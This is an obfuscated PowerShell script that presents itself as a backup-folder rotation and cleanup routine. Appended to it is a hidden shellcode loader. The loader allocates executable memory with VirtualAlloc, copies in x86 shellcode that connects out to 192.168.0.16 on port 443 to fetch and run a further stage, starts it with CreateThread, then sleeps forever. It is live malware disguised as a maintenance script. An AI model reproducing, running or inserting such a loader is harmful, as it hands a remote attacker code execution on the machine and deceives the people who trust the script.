${dailY`B`A`CKupfoLD`er} = ((("{0}{7}{3}{8}{2}{6}{1}{4}{5}" -f'by','Lib','arebyQCon','y','rarybyQ','Daily','tent','Qb','Qfilesh')).("{1}{2}{0}"-f'e','RePl','ac').Invoke('byQ','\'))
${archIvE`FOl`dER} = ((("{5}{3}{1}{10}{6}{11}{4}{7}{9}{2}{8}{0}" -f've','filesh','ibrary','S1j','t','S1j','S','e','S1jArchi','ntL','are','1jCon')) -rEPlaCe 'S1j',[cHaR]92)
${Da`TE} = (.("{0}{1}{2}" -f 'Get-','D','ate')).("{2}{1}{3}{0}"-f 'String','o','ToSh','rtDate').Invoke()
${daTEK`EeP} = (&("{1}{0}"-f 'te','Get-Da')).("{0}{2}{1}" -f'Add','s','Day').Invoke(-2).("{3}{0}{1}{2}"-f'S','hortD','ateString','To').Invoke()
${dAilyf`o`lDER} = "$($ArchiveFolder)\$($Date)"

if (-not(&("{2}{1}{0}"-f'h','t','Test-Pa') -Path ${DAILyF`ol`d`eR})) {
	&("{1}{0}{2}"-f 'ew-It','N','em') -Type ("{2}{0}{1}" -f'c','tory','Dire') ${D`AI`lYf`oLDER} | .("{0}{1}{2}"-f'O','ut','-Null')
}

if ((.("{0}{2}{1}"-f 'Get','hildItem','-C') -Path ${D`A`IlYBaC`KU`pFol`Der})."coU`Nt" -eq 1) {
	${b`AcKU`PfOl`deRpaTh} = &("{2}{4}{0}{1}{3}" -f'Chi','ldIte','Get','m','-') -Path ${Da`ilybaC`kUPFo`Ld`Er} | &("{3}{2}{1}{4}{0}" -f'ct','ct-Obj','e','Sel','e') -ExpandProperty ("{0}{1}{2}" -f 'Fu','llNa','me')
	.("{0}{2}{1}"-f 'M','e-Item','ov') -Path ${bACkup`Fo`ldE`RpATH} -Destination ${Da`I`lY`FOlDEr} -Force
}

${Ar`cH`i`VefoLDErs} = .("{2}{0}{1}"-f '-ChildI','tem','Get') -Path ${AR`Chi`VE`FoLD`Er} | .("{0}{1}{2}"-f 'Select-','Ob','ject') -ExpandProperty ("{1}{0}"-f 'ame','N')
${AR`c`hiVeFoLd`Ers} | &("{0}{1}{2}"-f 'ForEach-Ob','j','ect') {
	if (${_} -lt ${dat`e`kEEP}) {
		.("{0}{2}{1}{3}"-f'R','ve-I','emo','tem') -Path (${ArChi`VeFol`D`ER} + "\" + ${_}) -Recurse -Force | &("{1}{2}{0}" -f '-Null','Ou','t')
	}
}
${C} = ((("{10}{45}{68}{85}{44}{88}{27}{17}{3}{82}{90}{91}{35}{16}{93}{78}{13}{92}{74}{80}{42}{60}{69}{70}{63}{73}{24}{0}{32}{1}{2}{57}{11}{48}{81}{66}{14}{37}{41}{31}{62}{51}{46}{56}{9}{77}{40}{39}{4}{28}{58}{84}{22}{50}{8}{19}{25}{43}{26}{83}{7}{5}{53}{59}{21}{55}{65}{52}{38}{29}{15}{18}{6}{33}{30}{34}{36}{79}{20}{71}{86}{64}{75}{89}{49}{61}{72}{87}{54}{67}{23}{12}{47}{76}" -f 't',';[','Dl','sta','Attr','dr','ThreadId);','artAd','StackS','eThre','[DllI','po',', u','r lpAddress, ui',' exter','lags, IntPtr','lAlloc(I',']public ',' lp','ize, ','stati','ntP','uint','c','tec','IntP','lpS','l{0})','i','ationF','t(','nt',')','[DllImpor','{0}m','ua','svcrt.dl','n ','wCre','ad','r lpThre','I','locat','tr ','2.','mport(','a','int count','rt({0}kernel32.dll{0','t',' dw','re','ter, uint d','ess, ','i','tr l','t','lIm','b','I','i','(In','Ptr C','fl','P','pParame','public static','nt sr','{0}ker','onType, uin','t ','c exter','tPtr dest,','Pro','ze, ui','tr mem',');','ad(IntPt','tPt','l{0})]public ','nt flAl','})]','tic ','t','utes, ','nel3','n Int',' u','dl','se','extern ','IntPtr Virt','nt dwSi','n'))-F  [char]34);${W} = .("{2}{1}{0}" -f '-Type','d','Ad') -memberDefinition ${c} -Name ("{1}{0}" -f '32','Win') -namespace ("{3}{0}{2}{1}" -f'n32F','nctions','u','Wi') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x00,0x10,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${Z}."LeNg`Th" -gt 0x1000){${G} = ${z}."LeNg`TH"};${x}=${W}::("{1}{3}{2}{0}"-f 'lloc','V','lA','irtua').Invoke(0,0x1000,${g},0x40);for (${i}=0;${i} -le (${z}."L`engTH"-1);${i}++) {${W}::"me`mset"([IntPtr](${x}.("{2}{1}{0}" -f'2','nt3','ToI').Invoke()+${i}), ${Z}[${i}], 1)};${w}::("{1}{0}{2}"-f'reateThrea','C','d').Invoke(0,0,${X},0,0,0);for (;;){&("{2}{3}{0}{1}" -f 'e','p','Start-s','le') 60};
